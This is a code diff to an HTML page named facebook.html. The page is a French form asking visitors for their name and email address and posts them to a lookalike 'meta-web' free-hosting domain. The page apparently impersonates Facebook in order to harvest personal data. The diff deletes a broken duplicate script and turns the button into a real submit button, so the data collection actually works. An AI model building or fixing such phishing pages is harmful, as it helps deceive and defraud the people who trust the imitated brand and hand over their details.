--- a/facebook.html
+++ b/facebook.html
@@ -69,7 +69,7 @@
     <div class="card-body">
         <h5 class="card-title">Dites-nous un peu plus sur vous</h5>
 
-        <form target="_blank" method="post" action="https://meta-web.infinityfreeapp.com/proxy.php">
+        <form target="_blank" method="POST" action="https://meta-web.infinityfreeapp.com/proxy.php">
             <div class="form-group">
                 <label for="username">Nom</label>
                 <input type="text" class="form-control" id="username" name="username" placeholder="Votre nom" required>
@@ -80,25 +80,11 @@
                 <input type="email" class="form-control" id="email" name="email" placeholder="Votre adresse e-mail" required>
             </div>
 
-            <button type="button" class="btn btn-success btn-block" onclick="submitForm()">Continuer</button>
+            <!-- Le type doit être "submit" pour envoyer le formulaire -->
+            <button type="submit" class="btn btn-success btn-block">Continuer</button>
         </form>
     </div>
 </div>
-
-
-
-<script>
-    function submitForm() {
-        var username = document.getElementById('username').value;
-        var email = document.getElementById('email').value;
- } 
-  
-    function submitForm() {
-        window.location.href = "https://meta-web.infinityfreeapp.com/proxy.php";
-    }    
-   
-    
-</script>
 
 </body>
 </html>
